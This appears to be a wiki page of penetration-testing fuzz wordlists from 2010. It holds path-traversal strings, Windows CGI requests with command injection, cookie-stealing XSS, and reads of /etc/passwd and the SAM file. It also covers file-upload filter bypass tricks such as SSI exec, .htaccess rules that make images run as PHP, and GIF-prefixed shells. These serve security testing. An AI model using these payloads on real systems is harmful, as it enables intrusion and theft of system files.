.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
